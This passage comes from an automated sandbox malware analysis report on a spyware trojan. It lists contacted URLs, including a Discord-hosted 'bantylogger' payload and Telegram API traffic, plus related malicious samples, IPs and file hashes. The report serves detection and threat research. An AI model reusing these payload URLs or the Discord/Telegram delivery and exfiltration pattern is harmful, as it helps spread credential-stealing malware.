                            https://cdn.discordapp.com/CasPol.exe, 00000003.00000002.37820741378.000000000124B000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorErrorSecuriteInfo.com.Trojan.GenericKD.61167322.14727.exefalse
                                high
                                http://api.telegram.orgCasPol.exe, 00000003.00000002.37845047097.000000001D993000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.37844105160.000000001D922000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCasPol.exe, 00000003.00000002.37843863895.000000001D90F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.biCasPol.exe, 00000003.00000002.37820741378.000000000124B000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bCasPol.exe, 00000003.00000002.37821433832.00000000012A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://bLCeYs.comCasPol.exe, 00000003.00000002.37840725561.000000001D7D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        149.154.167.220
                                        api.telegram.orgUnited Kingdom
                                        62041TELEGRAMRUfalse
                                        162.159.129.233
                                        cdn.discordapp.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        Joe Sandbox Version:35.0.0 Citrine
                                        Analysis ID:679043
                                        Start date and time: 05/08/202205:03:002022-08-05 05:03:00 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 54s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                        Run name:Suspected Instruction Hammering
                                        Number of analysed new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@4/7@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 19.7% (good quality ratio 19.4%)
                                        • Quality average: 87.8%
                                        • Quality standard deviation: 21.1%
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 189
                                        • Number of non-executed functions: 137
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, login.live.com, wdcp.microsoft.com, clients.config.office.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        TimeTypeDescription
                                        05:05:29API Interceptor2752x Sleep call for process: CasPol.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        149.154.167.220ZYWXyzZQKo.exeGet hashmaliciousBrowse
                                          TgDofCOcVv.exeGet hashmaliciousBrowse
                                            LXYLAhHyUd.exeGet hashmaliciousBrowse
                                              JLkEICuVjq.exeGet hashmaliciousBrowse
                                                Processed payment.exeGet hashmaliciousBrowse
                                                  JGaR8nn6HU.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Variant.Barys.42241.11208.exeGet hashmaliciousBrowse
                                                      DHL AWB AND INVOICE.exeGet hashmaliciousBrowse
                                                        Required Order And Old Purchase.exeGet hashmaliciousBrowse
                                                          .htmGet hashmaliciousBrowse
                                                            Drawings#89332703.exeGet hashmaliciousBrowse
                                                              hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                ORDER LIST 1&2.exeGet hashmaliciousBrowse
                                                                  new order.exeGet hashmaliciousBrowse
                                                                    NEW ORDER.exeGet hashmaliciousBrowse
                                                                      PO 08022022.jsGet hashmaliciousBrowse
                                                                        NQjLJAL1L3.exeGet hashmaliciousBrowse
                                                                          P.O12537.exeGet hashmaliciousBrowse
                                                                            6KSE8PEEQD.exeGet hashmaliciousBrowse
                                                                              yNmFiYqJit_winpc2ned2222.jsGet hashmaliciousBrowse
                                                                                162.159.129.23364AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                                                http://162.159.129.233Get hashmaliciousBrowse
                                                                                • 162.159.129.233/favicon.ico
                                                                                2lfV6QiE6j.exeGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                                                                                SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                                                                                1PhgF7ujwW.exeGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                                                                                vhNyVU8USk.exeGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                                                                                Order 4503860408.exeGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/809311531652087809/839376179840286770/originbot4.0.exe
                                                                                cotizacin.docGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/812102734177763331/819187064415191071/bextrit.exe
                                                                                SecuriteInfo.com.PWS-FCXDF96A01717A58.15363.exeGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/819169403979038784/819184830453514270/fraem.exe
                                                                                7G5RoevPnu.exeGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/807746340997431316/809208342068199434/118fir2crtg.exe
                                                                                70% Balance Payment.docGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/785631384156110868/785631871395561492/italianmassloga.exe
                                                                                TT20201712.docGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                                                                ENQ-015August 2020 R1 Proj LOT.docGet hashmaliciousBrowse
                                                                                • cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                cdn.discordapp.comPlasma.exeGet hashmaliciousBrowse
                                                                                • 162.159.135.233
                                                                                e4.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                GnyGIMOLwK.exeGet hashmaliciousBrowse
                                                                                • 162.159.133.233
                                                                                AxseMjBluY.exeGet hashmaliciousBrowse
                                                                                • 162.159.130.233
                                                                                t3uEMr422v.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                EU-Business-Register_pdf.exeGet hashmaliciousBrowse
                                                                                • 162.159.134.233
                                                                                File.exeGet hashmaliciousBrowse
                                                                                • 162.159.135.233
                                                                                Lithoprint.exeGet hashmaliciousBrowse
                                                                                • 162.159.133.233
                                                                                0372Y591445-20220802-10842,00-USD-SWIFT MESAJI.exeGet hashmaliciousBrowse
                                                                                • 162.159.135.233
                                                                                uED2AIUn6R.exeGet hashmaliciousBrowse
                                                                                • 162.159.133.233
                                                                                e733cbcaee33c4e99d99f2a3b82e2530e10dac7106edf.exeGet hashmaliciousBrowse
                                                                                • 162.159.130.233
                                                                                aTlGCwT504.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                a880ebe9be4e9888ac2faa331c390b5d477fc828bf2e6.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                PO 7500093232.exeGet hashmaliciousBrowse
                                                                                • 162.159.135.233
                                                                                System.Activities.exeGet hashmaliciousBrowse
                                                                                • 162.159.135.233
                                                                                SOA for July.exeGet hashmaliciousBrowse
                                                                                • 162.159.133.233
                                                                                SecuriteInfo.com.MSIL.Downloadergen2.14361.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                SecuriteInfo.com.Trojan.MSIL.BluStealer.NX.MTB.13214.exeGet hashmaliciousBrowse
                                                                                • 162.159.134.233
                                                                                Shipping Documents & PO# -RDPL.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                CFCAB36F73560B2D15B6C266FEAAF0195A6E0D18C22AA.exeGet hashmaliciousBrowse
                                                                                • 162.159.133.233
                                                                                api.telegram.orgZYWXyzZQKo.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                TgDofCOcVv.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                LXYLAhHyUd.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                JLkEICuVjq.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Processed payment.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                JGaR8nn6HU.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                SecuriteInfo.com.Variant.Barys.42241.11208.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                DHL AWB AND INVOICE.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                G6kPQfnG8s.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                P7Epw5tRFF.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Required Order And Old Purchase.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                h7Bbt3YRig.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Drawings#89332703.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                TNT SHIPMENT DOCS.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                ORDER LIST 1&2.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                new order.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                NEW ORDER.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                PO 08022022.jsGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                NQjLJAL1L3.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                TELEGRAMRUhttps://vitalpbx.comGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                PtfqFnZtxB.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                f0dc8fa1a18901ac46f4448e434c3885a456865a3a309.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                7C2P2CKtTz.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                ZYWXyzZQKo.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                TgDofCOcVv.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                LXYLAhHyUd.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                jeqBDEzDeE.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                JLkEICuVjq.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                vxSBCLoYso.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                Processed payment.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                51BF4Ql66U.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                JGaR8nn6HU.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                SecuriteInfo.com.Variant.Barys.42241.11208.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                https://telegra.ph/Cryptocurrency-makes-people-millionaires-at-15-people-per-hour---Page-406192-08-02Get hashmaliciousBrowse
                                                                                • 149.154.164.13
                                                                                DHL AWB AND INVOICE.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Required Order And Old Purchase.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                ulRYla6dh8.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                IrPYliXpsE.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                X0De3Qm2Ds.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.99
                                                                                CLOUDFLARENETUShttps://www.frontrush.com/FR_Web_App/Message/MessageTracking.aspx?code=ODYzOTUxNTsyNjM3ODcyODtSOzgxOTc7TA==-f+lhm4TMRSg=&redir=http://4267.s1oAXteFRf.beyondsm.com/?=accountsreceivable@seven.com.auGet hashmaliciousBrowse
                                                                                • 104.17.25.14
                                                                                .htmlGet hashmaliciousBrowse
                                                                                • 104.18.11.207
                                                                                https://securb0a.top/Get hashmaliciousBrowse
                                                                                • 188.114.97.3
                                                                                https://test.katatillo.com/wp-content/wp-contacto/h0k3ts/redir/?m=reena_sood@hotmail.com/Get hashmaliciousBrowse
                                                                                • 172.67.70.233
                                                                                https://drive.google.com/file/d/16SdQLnBJ6tLnj432P6jDRNRwgR6JpZ7c/view?usp=sharingGet hashmaliciousBrowse
                                                                                • 104.18.6.145
                                                                                https://app.pandadoc.com/p/68c56729e1766ba3c2c45de9e71ef2844a97cabc?Get hashmaliciousBrowse
                                                                                • 104.19.154.83
                                                                                xd.x86Get hashmaliciousBrowse
                                                                                • 8.46.48.22
                                                                                Invoice IA-21-0124.htmGet hashmaliciousBrowse
                                                                                • 104.18.11.207
                                                                                http://macaddresschanger.comGet hashmaliciousBrowse
                                                                                • 104.21.4.4
                                                                                TheMoziV1.exeGet hashmaliciousBrowse
                                                                                • 104.21.36.10
                                                                                https://vps67241.inmotionhosting.com/~mombasavacation/kpl/MailUpdateFresh/index.html#Get hashmaliciousBrowse
                                                                                • 188.114.96.3
                                                                                Check#24345.htmlGet hashmaliciousBrowse
                                                                                • 104.18.11.207
                                                                                https://cdeusa.od2.vtiger.com/pages/8f3624gue6_98246trf7Get hashmaliciousBrowse
                                                                                • 104.17.25.14
                                                                                Plasma.exeGet hashmaliciousBrowse
                                                                                • 162.159.135.233
                                                                                2022_4_09_23_a.m..htmlGet hashmaliciousBrowse
                                                                                • 104.21.233.182
                                                                                https://if7bh-hyaaa-aaaad-qdiha-cai.ic.fleek.co/#amanda.winters@maryland.govGet hashmaliciousBrowse
                                                                                • 104.17.25.14
                                                                                https://app.pandadoc.com/p/cc564b25548c204ab0c9c5f5500517b910b213aa?Get hashmaliciousBrowse
                                                                                • 104.17.69.176
                                                                                Hess #Ud83d#Udd12Q3 Bonus-gmgdr.HTMlGet hashmaliciousBrowse
                                                                                • 104.17.25.14
                                                                                Hess #Ud83d#Udd12Q3 Bonus- whary.HTMlGet hashmaliciousBrowse
                                                                                • 104.17.25.14
                                                                                Hess #Ud83d#Udd12Q3 Bonus.HTMlGet hashmaliciousBrowse
                                                                                • 104.17.24.14
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                3b5074b1b5d032e5620f69f9f700ff0ePlasma.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Sapphire_Loader.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                TgDofCOcVv.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                LXYLAhHyUd.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                JLkEICuVjq.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                https://andromadehk.net/frontpage/Webmail/webmail.php?email=cactus@gmail.comGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Processed payment.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                e4.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                JGaR8nn6HU.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                4Wlojv8580.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                AxseMjBluY.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                wB5SK4x7xv.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                t3uEMr422v.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Ref151154247 spedizoine numero 1650386275.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                pea.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                http://tongyong888.xyz/dama.txtGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                DHL AWB AND INVOICE.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Ixmeut.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Required Order And Old Purchase.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                Eastern International purchase orderem.exeGet hashmaliciousBrowse
                                                                                • 149.154.167.220
                                                                                37f463bf4616ecd445d4a1937da06e19https://www.frontrush.com/FR_Web_App/Message/MessageTracking.aspx?code=ODYzOTUxNTsyNjM3ODcyODtSOzgxOTc7TA==-f+lhm4TMRSg=&redir=http://4267.s1oAXteFRf.beyondsm.com/?=accountsreceivable@seven.com.auGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                .htmlGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                download.jsGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                https://vps67241.inmotionhosting.com/~mombasavacation/kpl/MailUpdateFresh/index.html#Get hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                http://z2p5g.pwtel.pa-jakartautara.go.id.///?ZZZ#.Z21hY2RvbmFsZEBoaWdod29vZG9pbC5jb20=Get hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                https://cdeusa.od2.vtiger.com/pages/8f3624gue6_98246trf7Get hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                https://if7bh-hyaaa-aaaad-qdiha-cai.ic.fleek.co/#amanda.winters@maryland.govGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                https://app.pandadoc.com/p/cc564b25548c204ab0c9c5f5500517b910b213aa?Get hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                Hess #Ud83d#Udd12Q3 Bonus-gmgdr.HTMlGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                Hess #Ud83d#Udd12Q3 Bonus- whary.HTMlGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                Hess #Ud83d#Udd12Q3 Bonus.HTMlGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                https://vps67241.inmotionhosting.com/~mombasavacation/wp-content/plugins/MailUpdateFresh/index.html#name@example.comGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                https://chelseamoore.com/northcountryhealth.org/office_cookiesGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                PtfqFnZtxB.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                1cRmz4h1f8.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                https://xdqnp-xiaaa-aaaad-qdkma-cai.ic0.app/Get hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                Requisition ,,xp.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                7C2P2CKtTz.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                Requisition ,,xp.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                gvNe7sM8sZ.exeGet hashmaliciousBrowse
                                                                                • 162.159.129.233
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                C:\Users\user\AppData\Local\Temp\nsxD40A.tmp\System.dllSecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                                                                  hVAj77o331.exeGet hashmaliciousBrowse
                                                                                    hVAj77o331.exeGet hashmaliciousBrowse
                                                                                      invesssss.exeGet hashmaliciousBrowse
                                                                                        Lh6P9rwCju.exeGet hashmaliciousBrowse
                                                                                          invesssss.exeGet hashmaliciousBrowse
                                                                                            Lh6P9rwCju.exeGet hashmaliciousBrowse
                                                                                              pKAW7R09ha.exeGet hashmaliciousBrowse
                                                                                                Rnp7gsZAtH.exeGet hashmaliciousBrowse
                                                                                                  0xOTqBLwqS.exeGet hashmaliciousBrowse
                                                                                                    TgDofCOcVv.exeGet hashmaliciousBrowse
                                                                                                      pKAW7R09ha.exeGet hashmaliciousBrowse
                                                                                                        Y1VipMk6vh.exeGet hashmaliciousBrowse
                                                                                                          Rnp7gsZAtH.exeGet hashmaliciousBrowse
                                                                                                            xoFqJKku2Y.exeGet hashmaliciousBrowse
                                                                                                              LXYLAhHyUd.exeGet hashmaliciousBrowse
                                                                                                                0xOTqBLwqS.exeGet hashmaliciousBrowse
                                                                                                                  TgDofCOcVv.exeGet hashmaliciousBrowse
                                                                                                                    Sat#U0131n Alma Emri Metak_JJO-003, PDF.exeGet hashmaliciousBrowse
                                                                                                                      Y1VipMk6vh.exeGet hashmaliciousBrowse
                                                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
                                                                                                                        File Type:PC bitmap, Windows 3.x format, 312 x 151 x 24
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):141390
                                                                                                                        Entropy (8bit):7.047249669673193
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:Uw/tp3b9s6ock57BjGenwsyAF5gqGMw9NYip:U4pGcCYq97gdM8uip
                                                                                                                        MD5:C6FC898B474FCE2F10A59EDA59363013
                                                                                                                        SHA1:050C3340BDEBFB5229230EA6C8E96786DC93EDDB
                                                                                                                        SHA-256:0C81A78EE7F05C2019037C2C40A133234BD659AA9E51CCF66F1EEF78708FCAA0
                                                                                                                        SHA-512:3EAD5C1AB27BC1D82115BAC3054D28263399D8E00D6388F3BD29E8F78CED346A3548032E6238E1BA4345EC3475074838FD69F2B17B0FE26EFD8797CF86C50911
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:BMN(......6...(...8................(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):12288
                                                                                                                        Entropy (8bit):5.814115788739565
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                                                        MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                                                        SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                                                        SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                                                        SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                                                        Malicious:false
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                        Joe Sandbox View:
                                                                                                                        • Filename: SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe, Detection: malicious, Browse
                                                                                                                        • Filename: hVAj77o331.exe, Detection: malicious, Browse
                                                                                                                        • Filename: hVAj77o331.exe, Detection: malicious, Browse
                                                                                                                        • Filename: invesssss.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Lh6P9rwCju.exe, Detection: malicious, Browse
                                                                                                                        • Filename: invesssss.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Lh6P9rwCju.exe, Detection: malicious, Browse
                                                                                                                        • Filename: pKAW7R09ha.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Rnp7gsZAtH.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 0xOTqBLwqS.exe, Detection: malicious, Browse
                                                                                                                        • Filename: TgDofCOcVv.exe, Detection: malicious, Browse
                                                                                                                        • Filename: pKAW7R09ha.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Y1VipMk6vh.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Rnp7gsZAtH.exe, Detection: malicious, Browse
                                                                                                                        • Filename: xoFqJKku2Y.exe, Detection: malicious, Browse
                                                                                                                        • Filename: LXYLAhHyUd.exe, Detection: malicious, Browse
                                                                                                                        • Filename: 0xOTqBLwqS.exe, Detection: malicious, Browse
                                                                                                                        • Filename: TgDofCOcVv.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Sat#U0131n Alma Emri Metak_JJO-003, PDF.exe, Detection: malicious, Browse
                                                                                                                        • Filename: Y1VipMk6vh.exe, Detection: malicious, Browse
                                                                                                                        Reputation:high, very likely benign file
                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):98304
                                                                                                                        Entropy (8bit):2.9216957692876595
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                                                                                                                        MD5:1A706D20E96086886B5D00D9698E09DF
                                                                                                                        SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                                                                                                                        SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                                                                                                                        SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000
                                                                                                                        Category:modified
                                                                                                                        Size (bytes):98304
                                                                                                                        Entropy (8bit):0.08231524779339361
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                                                                        MD5:886A5F9308577FDF19279AA582D0024D
                                                                                                                        SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                                                                        SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                                                                        SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                        Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1040
                                                                                                                        Entropy (8bit):3.121619784784705
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:8wl0usXUCV/tz+7RafgKDCMqQ1cWQ1olfW+kjcmACtl9l/rNJkKAh4t2YCBTo8:81raRMgKHeizZAHN5HALJT
